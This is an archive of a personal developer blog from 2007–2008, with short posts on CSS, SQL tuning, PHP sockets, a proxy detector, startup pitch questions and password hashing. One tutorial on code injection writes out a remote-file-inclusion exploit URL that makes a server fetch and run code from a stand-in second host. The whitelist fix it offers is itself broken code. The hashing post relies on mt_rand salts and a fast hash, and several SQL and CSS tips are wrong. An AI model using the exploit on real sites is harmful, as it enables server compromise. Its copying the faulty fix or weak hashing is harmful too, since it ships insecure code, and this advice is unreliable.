Just do it

XP HOME local security

2008-09-04T18:04:00.003+10:00

xp HOME edition does not have local security policy setting（gpedit.msc), here is a solution:
1、Copy files from XP Pro (in “C:\WINDOWS\system32”) gpedit.msc、fde.dll、gpedit.dll、 gptext.dll、wsecedit.dll to HOME “C:\WINDOWS\system32”
2、Start->run: run following command “regsvr32 fde.dll”、“regsvr32 gpedit.dll”、“regsvr32 gptext.dll”、“regsvr32 wsecedit.dll”
3、Copy all the *.adm files in XP Pro “C:\WINDOWS\INF” to HOME edition in “C:\WINDOWS\INF”
4、Last step, run “gpedit.msc”, you will see the security policy console

PHP Socket Basic

2008-02-29T21:00:00.001+11:00



<?
// set some variables
$host = "192.168.1.99";
$port = 1234;
// don't timeout!
set_time_limit(0);
// create socket
$socket = socket_create(AF_INET, SOCK_STREAM, 0) or die("Could not create
socket\n");
// bind socket to port
$result = socket_bind($socket, $host, $port) or die("Could not bind to
socket\n");
// start listening for connections
$result = socket_listen($socket, 3) or die("Could not set up socket
listener\n");
// accept incoming connections
// spawn another socket to handle communication
$spawn = socket_accept($socket) or die("Could not accept incoming
connection\n");
// read client input
$input = socket_read($spawn, 1024) or die("Could not read input\n");
// clean up input string
$input = trim($input);
// reverse client input and send back
$output = strrev($input) . "\n";
socket_write($spawn, $output, strlen ($output)) or die("Could not write
output\n");
// close sockets
socket_close($spawn);
socket_close($socket);
?>

Business Presentation Tips

2008-02-11T14:57:00.000+11:00

http://www.feld.com/blog/archives/2004/06/the_torturous_w.html

Following are the questions to address.

1) WHAT IS YOUR VISION?
- What is your big vision?
- What problem are you solving and for whom?
- Where do you want to be in the future?

2) WHAT IS YOUR MARKET OPPORTUNITY AND HOW BIG IS IT?
- How big is the market opportunity you are pursuing and how fast is it growing?
- How established (or nascent) is the market?
- Do you have a credible claim on being one of the top two or three players in the market?

3) DESCRIBE YOUR PRODUCT/SERVICE
- What is your product/service?
- How does it solve your customer’s problem?
- What is unique about your product/service?

4) WHO IS YOUR CUSTOMER?
- Who are your existing customers?
- Who is your target customer?
- What defines an "ideal" customer prospect?
- Who actually writes you the check?
- Use specific customer examples where possible.

5) WHAT IS YOUR VALUE PROPOSITION?
- What is your value proposition to the customer?
- What kind of ROI can your customer expect by using buying your product/service?
- What pain are you eliminating?
- Are you selling vitamins, aspirin or antibiotics? (I.e. a luxury, a nice-to-have, or a need-to-have)

6) HOW ARE YOU SELLING?
- What does the sales process look like and how long is the sales cycle?
- How will you reach the target customer? What does it cost to "acquire" a customer?
- What is your sales, marketing and distribution strategy?
- What is the current sales pipeline?

7) HOW DO YOU ACQUIRE CUSTOMERS?
- What is your cost to acquire a customer?
- How will this acquisition cost change over time and why?
- What is the lifetime value of a customer?

8) WHO IS YOUR MANAGEMENT TEAM?
- Who is the management team?
- What is their experience?
- What pieces are missing and what is the plan for filling them?

9) WHAT IS YOUR REVENUE MODEL?
- How do you make money?
- What is your revenue model?
- What is required to become profitable?

10) WHAT STAGE OF DEVELOPMENT ARE YOU AT?
- What is your stage of development? Technology/product? Team? Financial metrics/revenue?
- What has been the progress to date (make reality and future clear)?
- What are your future milestones?

11) WHAT ARE YOUR PLANS FOR FUND RAISING?
- What funds have already been raised?
- How much money are you raising and at what valuation?
- How will the money be spent?
- How long will it last and where will the company "be" on its milestones progress at that time?
- How much additional funding do you anticipate raising & when?

12) WHO IS YOUR COMPETITION?
- Who is your existing & likely competition?
- Who is adjacent to you (in the market) that could enter your market (and compete) or could be a co-opted partner?
- What are their strengths/weaknesses?
- Why are you different?

13) WHAT PARTNERSHIPS DO YOU HAVE?
- Who are your key distribution and technology partners (current & future)?
- How dependent are you on these partners?

14) HOW DO YOU FIT WITH THE PROSPECTIVE INVESTOR?
- How does this fit w/ the investor’s portfolio and expertise?
- What synergies, competition exist with the investor’s existing portfolio?

15) OTHER
- What assumptions are key to the success of the business?
- What "gotchas" could change the business overnight? New technologies, new market entrants, change in standards or regulations?
- What are your company’s weak links?

Make a container's border work!

2008-02-04T11:59:00.000+11:00

div.container {
 border: 1px solid #000000;
 overflow: hidden;
 width: 100%;
}

div.left {
 width: 45%;
 float: left;
}

div.right {
 width: 45%;
 float: right;
}

Code Injection Vulnerabilities Explained

2008-02-01T12:15:00.001+11:00

Introduction:

There has been a sudden increase of attacks on sites that have Code Injection vulnerabilites. Code Injection is a term used when code is injected straight into a program/script from an outside source for execution at some point in time. These type of vulnerabilities may be many times worse than any other vulnerability, since the security of the website, and possibly of the server, is compromised.

Example:

This example will help you understand what exactly a Code Injection Vulnerability looks like in it's simplest form, and unfortunately, this snipet is actually used in quite a few websites.

... html header ...

<?php
include ('$page');
?>

... html footer ...

Note: There is no php code in the header or footer, it is just HTML.

To some, this is obviously a big mistake. The '$page' variable is never checked, so an attacker can choose what to include. So how does one exploit the above code?

Example Exploit:

An attacker can create a 'txt' file on another server and have it included in the above example. If the attacker puts php code in this 'txt' file, it will be executed on the exploited host.

<?php
phpinfo();
?>

Let's say the vulnerable code is located at 'http://domain/index.php', and the 'txt' file is located at 'http://domain2/code.txt', then the attacker would enter something like this into his browser:

http://domain/index.php?page=http://domain2/code.txt

Then end result would have the exploited website execute the command 'phpinfo()' in between the header and footer where the php include is located.

Explaination:

If you had no problem understanding why this would happen, feel free to skip this section.

The 'include()' function takes data from another file, that is defined in the brackets (), and places the data in the area that the include is executed. So let us run through the program in our minds, and assume the url mentioned above is entered into a browser. In the url, it defines the variable $page as containing 'http://domain2/code.txt', so let us replaces all $page variables with this string:

... html header ...

<?php
include ('http://domain2/code.txt');
?>

... html footer ...

Now the include function takes the code from the url/file mentioned, and places it where the include was called, so the result would be:

... html header ...

<?php
phpinfo();
?>

... html footer ...

Now this is what the server ends up processing. What happens here is the header is displayed, then the php command; 'phpinfo()' is executed, followed by the footer at the end.

What can happen:

The above example had harmless code being executed, but the attacker can execute more malicious code.

An attacker can output the contents of any php file raw to the browser, where he can possibly obtain an sql login/password to your database.

An attacker can use your website to send out large amounts of spam to various email addresses.

An attacker can deface your website.

An attacker can obtain private information.

An attacker may gain access to the whole server.

This is why it is important to secure your website, and not leave such vulnerabilities open for attack.

Solution:

There is a very simple solution to the above example, and that is to check the variable. In the above example, 99% of the time you know what values $page should be, and therefore can check to see if that is the case.

... html header ...

<?php
//list of valid pages
$pages=array("games/index.html", "news/news.html", "games/1.html");

//check $page variable
$valid=false;
for ($i=0; $i<sizeof($pages) || !$valid; $i++) {
 if ($page==$page[$i]) {
  $valid=true;
 }
}
if ($valid) include($page);
if (!$valid) include($pages[0]); // include the first page if not valid
?>

... html footer ...

Another Solution:

Another solution is to check for invalid characters and setup all the page files in a seperate directory, all together.

Example of where the pages are placed:

pages/games.html

pages/news.html

pages/games-1.html

Code:

... html header ...

<?php
$invalidChars=array("/",".","\\","\"",";");
$page=str_replace($invalidChars,"",$page);
include ("pages/".$page.".html");
?>

... html footer ...

Merge in Source Control

2008-01-19T14:24:00.001+11:00

In theory, this could be very difficult:

* What happens if Jane changed some of the same lines that Joe changed, but in different ways?
* What happens if Jane's changes are functionally incompatible with Joe's?
* What happens if Jane made a change to a C# function which Joe has deleted?
* What happens if Jane changed 80 percent of the lines in the file?
* What happens if Jane and Joe each changed 80 percent of the lines in the file, but each did so for entirely different reasons?
* What happens if Jane's intent was not clear and she cannot be reached to ask questions?

SQL Performance

2008-01-18T13:39:00.000+11:00

* One: only "tune" sql after code is confirmed as working correctly.

* Two: ensure repeated sql statements are written absolutely identically to facilate efficient reuse: re-parsing can often be avoided for each subsequent use.

Writing best practices: all sql verbs in upper-case i.e. SELECT; separate all words with a single space; all sql verbs begin on a new line; sql verbs aligned right or left within the initial verb; set and maintain a table alias standard; use table aliases and when a query involves more than one table prefix all column names with their aliases. Whatever you do, be consistent.

* Three: code the query as simply as possible i.e. no unnecessary columns are selected, no unnecessary GROUP BY or ORDER BY.

* Four: it is the same or faster to SELECT by actual column name(s). The larger the table the more likely the savings.
Use:
SELECT customer_id, last_name, first_name, street, city FROM customer; Rather than:
SELECT * FROM customer;

* Five: do not perform operations on DB objects referenced in the WHERE clause:
Use:
SELECT client, date, amount FROM sales WHERE amount > 0;
Rather than:
SELECT client, date, amount FROM sales WHERE amount!= 0;

* Six: avoid a HAVING clause in SELECT statements - it only filters selected rows after all the rows have been returned. Use HAVING only when summary operations applied to columns will be restricted by the clause. A WHERE clause may be more efficient.
Use:
SELECT city FROM country WHERE city!= 'Vancouver' AND city!= 'Toronto'; GROUP BY city;
Rather than:
SELECT city FROM country GROUP BY city HAVING city!= 'Vancouver' AND city!= 'Toronto';

* Seven: when writing a sub-query (a SELECT statement within the WHERE or HAVING clause of another sql statement):
-- use a correlated (refers to at least one value from the outer query) sub-query when the return is relatively small and/or other criteria are efficient i.e. if the tables within the sub-query have efficient indexes.
-- use a noncorrelated (does not refer to the outer query) sub-query when dealing with large tables from which you expect a large return (many rows) and/or if the tables within the sub-query do not have efficient indexes.
-- ensure that multiple sub-queries are in the most efficient order.
-- remember that rewriting a sub-query as a join can sometimes increase efficiency.

* Eight: minimise the number of table lookups especially if there are sub-query SELECTs or multicolumn UPDATEs.

* Nine: when doing multiple table joins consider the benefits/costs for each of EXISTS, IN, and table joins. Depending on your data one or another may be faster.
Note: IN is usually the slowest.
Note: when most of the filter criteria are in the sub-query IN may be more efficient; when most of the filter criteria are in the parent-query EXISTS may be more efficient.

* Ten: where possible use EXISTS rather than DISTINCT.

* Eleven: where possible use a non-column expression (putting the column on one side of the operator and all the other values on the other). Non-column expressions are often processed earlier thereby speeding the query.
Use:
WHERE SALES < 1000/(1 + n);
Rather than:
WHERE SALES + (n * SALES) < 1000;

* Twelve: the most efficient method for storing large binary objects, i.e. multimedia objects, is to place them in the file system and place a pointer in the DB.

* Thirteen: Use inner-joint rather than left/right/cross joint

* Fourteen: In most of cases, GROUP+HAVING < WHERE

PHP HASH

2008-01-17T09:33:00.001+11:00

If you build websites that require users to register it’s your responsibility to keep their passwords safe. And if you’re storing the passwords in plain text then you’re not doing your job properly. It may be that, like Reddit, you think that storing passwords in plain text leads to a better user experience. I happen to agree with you. But then, like Reddit, what happens if your database is stolen? It’s not just your site that is compromised. Since most users use the same password on multiple sites, all those sites have also been compromised.

No data is entirely secure, and if anyone else has access to your webserver (the company managing the server for you?) or your database (the company storing the backups?) then you don’t have total control over the security anyway. So there’s always a chance your database could be stolen. So, the simple rule is to hash your passwords.

Hashing

A hash is a string derived from the original password via a one-way algorithm. In other words, it’s easy to create the hash from the original, but harder (when used for security, ideally impossible) to create the original from the hash. You store the hash in the database, and when the user signs-in you hash the password they sign-in with and compare it to the hash in the database. Something like this

if( $user->passwordhash == sha1( $_POST['password'] ) )

That way, you never store the user’s password.

There are a number of hashing algorithms in PHP, of which md5 and sha1 are the most commonly used. Unfortunately, neither is as secure as they were once thought to be. It would be better to use a more secure hash, and if you have the Hash engine in your PHP installation (included by default since PHP 5.1.2) then you have access to many more algorithms. So a better example would be

if( $user->passwordhash == hash( 'whirlpool', $_POST['password'] ) )

Rainbow tables

But there’s another problem. Once your database is stolen, the thief has plenty of time to crack the passwords using a simple Rainbow Table attack. This involves creating a large selection of hashes based on likely passwords (e.g. every word in the dictionary) and then comparing the hashes with the hashes in your database. Within an hour or so, half the passwords in your database will probably have been cracked.

To prevent this you should salt each password by adding a random string to it (called a salt or nonce). The time consuming part of a rainbow table attack is building the dictionary of hashes. Adding a random salt to the password means the thief has to build a whole new dictionary of hashes for each salt, making a rainbow table attack too time consuming to be viable. Each password should have a different salt, and the salt doesn’t even need to be secret.

The Code bit

So, for secure passwords you need code that looks something like this

// get a new salt - 8 hexadecimal characters long
// current PHP installations should not exceed 8 characters
// on dechex( mt_rand() )
// but we future proof it anyway with substr()
function getPasswordSalt()
{
    return substr( str_pad( dechex( mt_rand() ), 8, '0',
                                           STR_PAD_LEFT ), -8 );
}

// calculate the hash from a salt and a password
function getPasswordHash( $salt, $password )
{
    return $salt . ( hash( 'whirlpool', $salt . $password ) );
}

// compare a password to a hash
function comparePassword( $password, $hash )
{
    $salt = substr( $hash, 0, 8 );
    return $hash == getPasswordHash( $salt, $password );
}

// get a new hash for a password
$hash = getPasswordHash( getPasswordSalt(), $password );

You don’t have to attach the salt to the hash, you can instead store them separately within the database, but I like keeping them together in a single string. Equally, the salt needn’t be in hexadecimal, but I like the symmetry with the hexadecimal hash.

Finally, as Thomas Ptacek points out, you don’t want the fastest hash algorithm in the world for this - a fast algorithm is more useful to an attacker than it is to you.

Good Encryption: http://drupal.org/project/phpass

Proxy Detector

2008-01-16T22:47:00.000+11:00

<?
/**
* Proxy Detector v0.1
*  copyrights by: Daantje Eeltink (me@daantje.nl)
*      http://www.daantje.nl
*
*  first build: Mon Sep 18 21:43:48 CEST 2006
*  last build: Tue Sep 19 10:37:12 CEST 2006
*
* Description:
*  This class can detect if a visitor uses a proxy server by scanning the
*  headers returned by the user client. When the user uses a proxy server,
*  most of the proxy servers alter the header. The header is returned to
*  PHP in the array $_SERVER.
*
* License:
*  GPL v2 licence. (http://www.gnu.org/copyleft/gpl.txt)
*
* Support:
*  If you like this class and find it usefull, please donate one or two
*  coins to my PayPal account me@daantje.nl
*
* Todo:
*  Add open proxy black list scan.
*/

class proxy_detector {

 /**
 * CONSTRUCTOR
 * Set defaults...
 */
 function proxy_detector(){
  $this->config = array();
  $this->lastLog = "";

        //set default headers
  $this->scan_headers = array(
   'HTTP_VIA',
   'HTTP_X_FORWARDED_FOR',
   'HTTP_FORWARDED_FOR',
   'HTTP_X_FORWARDED',
   'HTTP_FORWARDED',
   'HTTP_CLIENT_IP',
   'HTTP_FORWARDED_FOR_IP',
   'VIA',
   'X_FORWARDED_FOR',
   'FORWARDED_FOR',
   'X_FORWARDED',
   'FORWARDED',
   'CLIENT_IP',
   'FORWARDED_FOR_IP',
   'HTTP_PROXY_CONNECTION'
  );
 }


 /**
 * VOID setHeader( STRING $trigger )
 * Set new header trigger...
 */
 function setHeader($trigger){
  $this->scan_headers[] = $trigger;
 }


 /**
 * ARRAY $triggers = getHeaders( VOID )
 * Get all triggers in one array
 */
 function getHeaders(){
     return $this->scan_headers;
 }


 /**
 * VOID setConfig( STRING $key,  STRING $value)
 * Set config line...
 */
 function setConfig($key,$value){
  $this->config[$key] = $value;
 }


 /**
 * MIXED $config = getConfig( [STRING $key] )
 * Get all config in one array, or only one config value as a string.
 */
 function getConfig($key=''){
     if($key)
      return $this->config[$key];
     else
      return $this->config;
 }


 /**
 * STRING $log = getLog( VOID )
 * Get last logged information. Only works AFTER calling detect()!
 */
 function getLog(){
  return $this->lastLog;
 }


 /**
 * BOOL $proxy = detect( VOID )
 * Start detection and return true if a proxy server is detected...
 */
 function detect(){
  $log = "";

  //scan all headers
  foreach($this->scan_headers as $i){
   //proxy detected? lets log...
   if($_SERVER[$i])
    $log.= "trigger $i: ".$_SERVER[$i]."\n";
  }

     //let's do something...
  if($log){
   $log = $this->lastLog = date("Y-m-d H:i:s")
."\nDetected proxy server: "
.gethostbyaddr($_SERVER['REMOTE_ADDR'])." ({$_SERVER['REMOTE_ADDR']})\n".$log;

   //mail message
            if($this->getConfig('MAIL_ALERT_TO'))
    mail($this->getConfig('MAIL_ALERT_TO'),"
    Proxy detected at {$_SERVER['REQUEST_URI']}",$log);

   //write to file
   $f = $this->getConfig('LOG_FILE');
            if($f){
    if(is_writable($f)){
     $fp = fopen($f,'a');
     fwrite($fp,"$log\n");
     fclose($fp);
             }else{
     die("<strong>Fatal Error:</strong> Couldn't write to file: 
'<strong>$f</strong>'<br>
Please check if the path exists and is writable for the webserver or php...");
             }
            }

   //done
   return true;
  }

  //nope, no proxy was logged...
  return false;
 }
}

?>

Browsing the code you will notice that it uses a log file to store the data so we will have to create one called "
proxy_detector.log". Don't forget to give it the proper permission on the server (CHMOD it to make it writable).

Ok so we already have 2 files. Let's go ahead and create a new one called "proxy_detector.inc.php"
.This one will initiate our class for our future use and do what we want it to do so I suggest you to edit it to suit your needs. Copy paste this code and save it:

<?
/**
* Proxy Detector v0.1
* Implementation example.
*
* Mon Sep 18 23:29:47 CEST 2006
* by: me@daantje.nl
*
* Documentation:
*  I use this file as an include at the top of some php files
*  to block proxy users from the scripts that included this file.
*
*  This file is only an example on how to implement the detector class.
*  But it could be usefull as is...
*
*  Check the remarks in the class for more documentation.
*/

//include detector class, assuming it's in the same directory as this file...
include_once(dirname(__FILE__)."/proxy_detector.class.php");

//init class
$proxy = new proxy_detector();

//set optional extra triggers, no need to... 
//I think I've got all of them covered in the class...
// $proxy->setTrigger('HTTP_SOME_HEADER_1');
// $proxy->setTrigger('HTTP_SOME_HEADER_2');

//set optional config
// $proxy->setConfig('MAIL_ALERT_TO','me@daantje.nl');
// $proxy->setConfig('LOG_FILE','/home/daantje/public_html/proxy/proxy_detector.log');

//start detect
if($proxy->detect()){

    //returned true, lets die...
 echo "<h1>Proxy detected</h1>";
 echo "
 Please disable your proxy server in your browser preferences or internet settings,
 and try again.<br><br>";

 //parse logged info
 echo nl2br($proxy->getLog());

    //some credits...
 echo "<hr><strong>proxy detector v0.1</strong> 
- &copy;2006 < a href=\"http://www.daantje.nl\" 
target=\"_blank\">daantje.nl</a>";

 //and do nothing anymore! (but not in my example)
 //exit();
}

//else, proceed as normal, put your code here...
?>

DOM / AJAX

2007-12-28T16:26:00.000+11:00


function view_detail(id) { 
  // delete detail rows
  
  
  // create a new row with one cell in it
  var main_table = document.getElementsByTagName('table')[0];
  var table_row = document.getElementById('tr'+id);

  var row_index = table_row.rowIndex;
  var new_row = main_table.insertRow(row_index+1);
  var cell_a = new_row.insertCell(0);
  cell_a.colSpan = "7";

  
  // create a input box
  var textbox = document.createElement('input');
    textbox.type = 'text';
    textbox.name = 'txtRow' + id;
    textbox.id = 'txtRow' + id;
    textbox.size = 220;
  cell_a.appendChild(textbox);
  
  // trigger Ajax
        xHRObject.onreadystatechange = getData(id);  
  xHRObject.open("GET", "log_detail.php?id="+id, false);
  xHRObject.send(null);

 }
    
    function getData(id){
         if ((xHRObject.readyState==4) && (xHRObject.status==200))
   { 
    alert("yap");
    var textbox = document.getElementById('txtRow'+id);
    textbox.value = xHRObject.responseText;
   }
  }

10 Trick in CSS design

2007-12-01T15:37:00.000+11:00

1. CSS font shorthand rule

When styling fonts with CSS you may be doing this:
font-size: 1em;
line-height: 1.5em;
font-weight: bold;
font-style: italic;
font-variant: small-caps;
font-family: verdana,serif;

There's no need though as you can use this CSS shorthand property:
font: 1em/1.5em bold italic small-caps verdana,serif

Much better! Just a couple of words of warning: This CSS shorthand version will only work if you're specifying both the font-size and the font-family. Also, if you don't specify the font-weight, font-style, or font-varient then these values will automatically default to a value of normal, so do bear this in mind too.
2. Two classes together

Usually attributes are assigned just one class, but this doesn't mean that that's all you're allowed. In reality, you can assign as many classes as you like! For example:
<p class="text side">...</p>

Using these two classes together (separated by a space, not with a comma) means that the paragraph calls up the rules assigned to both text and side. If any rules overlap between the two classes then the class which is below the other in the CSS document will take precedence.
3. CSS border default value

When writing a border rule you'll usually specify the colour, width and style (in any order). For example, border: 3px solid #000 will give you a black solid border, 3px thick. However the only required value here is the border style.

If you were to write just border: solid then the defaults for that border will be used. But what defaults? Well, the default width for a border is medium (equivalent to about 3 to 4px) and the default colour is that of the text colour within that border. If either of these are what you want for the border then you can leave them out of the CSS rule!
4. !important ignored by IE

Normally in CSS whichever rule is specified last takes precedence. However if you use !important after a command then this CSS command will take precedence regardless of what appears after it. This is true for all browsers except IE. An example of this would be:
margin-top: 3.5em !important; margin-top: 2em

So, the top margin will be set to 3.5em for all browsers except IE, which will have a top margin of 2em. This can sometimes come in useful, especially when using relative margins (such as in this example) as these can display slightly differently between IE and other browsers.

(Many of you may also be aware of the CSS child selector, the contents of which IE ignores.)
5. Image replacement technique

It's always advisable to use regular HTML markup to display text, as opposed to an image. Doing so allows for a faster download speed and has accessibility benefits. However, if you've absolutely got your heart set on using a certain font and your site visitors are unlikely to have that font on their computers, then really you've got no choice but to use an image.

Say for example, you wanted the top heading of each page to be ‘Buy widgets’, as you're a widget seller and you'd like to be found for this phrase in the search engines. You're pretty set on it being an obscure font so you need to use an image:
<h1><img src="widget-image.gif" alt="Buy widgets" /></h1>

This is OK but there's strong evidence to suggest that search engines don't assign as much importance to alt text as they do real text (because so many webmasters use the alt text to cram in keywords). So, an alternative would be:
<h1><span>Buy widgets</span></h1>

Now, this obviously won't use your obscure font. To fix this problem place these commands in your CSS document:
h1
{
background: url(widget-image.gif) no-repeat;
}

h1 span
{
position: absolute;
left:-2000px;
}

The image, with your fancy font, will now display and the regular text will be safely out of the way, positioned 2000px to the left of the screen thanks to our CSS rule.
6. CSS box model hack alternative

The box model hack is used to fix a rendering problem in pre-IE 6 browsers, where by the border and padding are included in the width of an element, as opposed to added on. For example, when specifying the dimensions of a container you might use the following CSS rule:
#box
{
width: 100px;
border: 5px;
padding: 20px;
}

This CSS rule would be applied to:
<div id="box">...</div>

This means that the total width of the box is 150px (100px width + two 5px borders + two 20px paddings) in all browsers except pre-IE 6 versions. In these browsers the total width would be just 100px, with the padding and border widths being incorporated into this width. The box model hack can be used to fix this, but this can get really messy.

A simple alternative is to use this CSS:
#box
{
width: 150px;
}

#box div
{
border: 5px;
padding: 20px;
}

And the new HTML would be:

<div id="box"><div>...</div></div>

Perfect! Now the box width will always be 150px, regardless of the browser!
7. Centre aligning a block element

Say you wanted to have a fixed width layout website, and the content floated in the middle of the screen. You can use the following CSS command:
#content
{
width: 700px;
margin: 0 auto;
}

You would then enclose <div id="content"> around every item in the body of the HTML document and it'll be given an automatic margin on both its left and right, ensuring that it's always placed in the centre of the screen. Simple... well not quite - we've still got the pre-IE 6 versions to worry about, as these browsers won't centre align the element with this CSS command. You'll have to change the CSS rules:
body
{
text-align: center;
}

#content
{
text-align: left;
width: 700px;
margin: 0 auto;
}

This will then centre align the main content, but it'll also centre align the text! To offset the second, probably undesired, effect we inserted text-align: left into the content div.
8. Vertically aligning with CSS

Vertically aligning with tables was a doddle. To make cell content line up in the middle of a cell you would use vertical-align: middle. This doesn't really work with a CSS layout. Say you have a navigation menu item whose height is assigned 2em and you insert this vertical align command into the CSS rule. It basically won't make a difference and the text will be pushed to the top of the box.

Hmmm... not the desired effect. The solution? Specify the line height to be the same as the height of the box itself in the CSS. In this instance, the box is 2em high, so we would insert line-height: 2em into the CSS rule and the text now floats in the middle of the box - perfect!
9. CSS positioning within a container

One of the best things about CSS is that you can position an object absolutely anywhere you want in the document. It's also possible (and often desirable) to position objects within a container. It's simple to do too. Simply assign the following CSS rule to the container:
#container
{
position: relative;
}

Now any element within this container will be positioned relative to it. Say you had this HTML structure:

<div id="container"><div id="navigation">...</div></div>

To position the navigation exactly 30px from the left and 5px from the top of the container box, you could use these CSS commands:
#navigation
{
position: absolute;
left: 30px;
top: 5px;
}

Perfect! In this particular example, you could of course also use margin: 5px 0 0 30px, but there are some cases where it's preferable to use positioning.
10. Background colour running to the screen bottom

One of the disadvantages of CSS is its inability to be controlled vertically, causing one particular problem which a table layout doesn't suffer from. Say you have a column running down the left side of the page, which contains site navigation. The page has a white background, but you want this left column to have a blue background. Simple, you assign it the appropriate CSS rule:
#navigation
{
background: blue;
width: 150px;
}

Just one problem though: Because the navigation items don't continue all the way to the bottom of the screen, neither does the background colour. The blue background colour is being cut off half way down the page, ruining your great design. What can you do!?

Unfortunately the only solution to this is to cheat, and assign the body a background image of exactly the same colour and width as the left column. You would use this CSS command:
body
{
background: url(blue-image.gif) 0 0 repeat-y;
}

This image that you place in the background should be exactly 150px wide and the same blue colour as the background of the left column. The disadvantage of using this method is that you can't express the left column in terms of em, as if the user resizes text and the column expands, it's background colour won't.

At the time of writing though, this is the only solution to this particular problem so the left column will have to be expressed in px if you want it to have a different background colour to the rest of the page.

Transfer Deprecated HTML Attributes to CSS

2007-11-20T07:59:00.000+11:00

type

The type attribute was used to set the list markers on unordered and ordered lists (#ul> and #ol>) and on individual list items (#li>) for example “a, b, c”, “1, 2, 3″, “i, ii, iii”, etc.

#ol type="a">
#li>First item#/li>
#li>Second item#/li>
#li>Third item#/li>
#/ol>

1. First item
2. Second item
3. Third item

Deprecated example of “type” in an ordered list element

To replicate this in CSS you must use list-style-type:

ol { list-style-type: lower-alpha; }

This styling can also be used on individual #li> elements to create differing sequence types, if you really wanted to!

Using the HTML attributes there were only 5 possible types you could use (1, A, a, I and i). By using CSS this increases to a possible 20 values including types such as “hiragana-iroha”, which is a Japanese sequence, and “none” to stop displaying any kind of sequence or bullet. An example of all the types can be seen if you are viewing the page using Firefox - unfortunately IE doesn’t recognise any of the more complex character types and will default to the list’s own style type.

border

The border attribute was deprecated only on the #img /> and #object> elements, but this should be used anywhere that you’d like to modify a border - to further the separation of presentation and content.

The most common place you’ll see this attribute, in current use, is on images that are surrounded by a link:

#a href="#">
#img src="images/cup.gif" width="10"
height="20" border="0" />
#/a>

Deprecated example of “border” in the image element

Without setting the border to zero, the browser’s default and usually undesirable rendering is to place an blue border around the image, to show that it is clickable (much like it will add a blue underline to a text link).

You will probably want to remove the border from all images that fall inside a link, using CSS you do this using the “border” declaration:

a img { border: 0; }
// you could also use border:none;

The flexibility in using CSS in favour of the deprecated attribute is similar to the hspace/vspace example above. It is now very easy to specify a different border size, colour and style to each different side of the item.

img {
border-width: 2px 4px;
border-style:dotted dashed solid none;
border-color: red;
}
// width: top and bottom 2px, left and right 4px
// style: top dotted, right dashed,
bottom solid, left none
// color: all sides red, if present

size

Size was in use on the #hr /> (horizontal rule) element to set it’s height in pixels or percentage. Years ago I would always set size to 1 to give a thin solid black line, which would get rid of the default two-tone shading effect - more on the shading of #hr /> later.

#hr size="1" />
#hr size="5%" />

Before I show how to replicate this using CSS, I should point out that there are continual wranglings about whether or not this whole tag should still be in use. The two sides to the argument are; on the one hand it is a purely presentational element and should be removed in favour of using a border declaration in CSS; and on the other hand it has its semantic place to divide sections of text. I will leave the decision to you - a huge discussion on #hr />’s semantics took place on the Web Standards Group list last week.

To replicate in CSS is simple and uses the “height” declaration:

hr { height:1px; }
hr { height:5%; }

By moving this to CSS we again open up the possibilities of how a horizontal rule can be styled - adding colour, relative heights and background images (note: the rendering of background images and colour is not consistent across the browsers).

noshade

The #hr /> element had another attribute deprecated; noshade was a boolean attribute used to remove the two-tone shading effect and set the line in a solid colour, usually grey.

#hr noshade />

As a small aside, boolean attributes in XHTML are no longer used in their shortened form. For example, the “checked” attribute that is still in use on #input type=”checkbox” /> elements should be written in long-hand:

#input type="checkbox" checked="checked" />

Similarly for “selected” in #option> elements:

#option selected="selected" >Option 1#/option>

Removing the shade in CSS isn’t as straight-forward as the attributes we’ve seen so far. In IE you’ll need to use the “color” declaration; and in Mozilla and Opera you need to use both the “border” and “background-color” declarations to get a similar effect to the original attributes. The following should be safe across different browers.

hr {
color: gray; // for IE
background-color: gray; // for Mozilla and Firefox
border: 0; // for Mozilla and Firefox
}

The same styling rules apply as for the “size” attribute above.

width and height

The width attribute was deprecated for use on #th>, #td> and #hr />, and the height attribute on #th> and #td>. I hope it’s obvious that they set the width and height of the element on which they are specified, quoted in pixels or percentage.

#td width="50%" height="20px">Umbrella stand#/td>

Deprecated example of “width” and “height” in a table data element

In the old days of table-based layouts, width and height would be littered around a page’s code hugely increasing the byte size of the file. Removing them gives you a huge saving in bandwidth and simplifies the code for easier maintenance. In CSS you’d replace these attributes in the following way:

td {
width: 50%;
height: 20px;
}

bgcolor

Bgcolor was an attribute used to set the background colour of the #table> elements and the #body> element. It would be used to set the background colour of the whole page, you can use a named value or hex if necessary:

#body bgcolor="purple">

Or to set individual rows or cells of tables:

#table>
#tr bgcolor="pink">
#td>The pink row#/td>
#td>Still the pink row#/td>
#/tr>
#tr>
#td bgcolor="green">The green cell#/td>
#td>No colour#/td>
#/tr>
#/table>

In CSS the property is “background-color” (to colour individual rows/cells you would need to add a class or id to those rows):

body { background-color: purple; }
tr.odd { background-color: pink; }
td.highlight { background-color: green; }

Moving this to CSS gives you so much more control over the way pages and tables look. There are a whole host of background related CSS properties such as “background-image”, “background-position”, “background-attachment” and “background-repeat”; these can be grouped together using the background shorthand:

background: color | image | repeat | attachment | position ;

So if you had a flower image that you wanted to appear at the bottom right of all pages on your site you’d use the “background” declaration to set this up in one line;

body { background: white url(imgs/flower.jpg) no-repeat right bottom; }

align

The align attribute was used to specify the horizontal alignment of an element with the surrounding content. Now it should not be used on any element but you still see it used mainly on the #img />, #hx> and #p> elements:

#h1 align="center">Centred heading#/h1>
#p align="justified">Bit of text that should be justified.#/p>

Deprecated example of “align” in the h1 and p elements

The equivalent CSS property is text-align and has the same values as the align attribute; left, right, center and justified.

h1 { text-align: center; }
p { text-align: justified; }

The thing to remember with this property is that it can align any element and not just text, as it seems to imply.

For reference; CSS2 introduced another value for text-align, which is “#string>” and for use in tables only. It aligns the text to whatever string value you enter, for example td { text-align: "."; } could be used to align a column of numerical data on the decimal point. It was withdrawn from CSS2.1 due to lack of implentation among the browsers.
End

The main thing to remember is that it is always better to remove all presentational attributes from your (X)HTML code and use CSS to do the same job. There’s a CSS declaration for any HTML attribute, so remove them all for best results.
Additional Resources

W3 Schools: this is the site I started learning from
HTML Dog: excellent resource, written by a pro
CSS Zen Garden/: the original CSS playground, great for inspiration and pushing the limits of what CSS can do for you

Dynamic Chart Drawn by JpGraph

2007-11-18T22:25:00.000+11:00

Load data from database to JpGraph

1、
copy
example16.2.php from ./src/Examples
and
jpgraph_bar.php、 jpgraph_gradient.php、jpgraph_line.php、jpgraph_plotmark.inc、jpgraph.php from ./src
to current folder

2、create database name: jpg，Table: test
two fields：
id（Key）：int
number：int
add some data

3、Modify example16.2.php

#?php
include ("jpgraph.php");
include ("jpgraph_line.php");
include ("jpgraph_bar.php");

$connect=mysql_connect("localhost","root","");
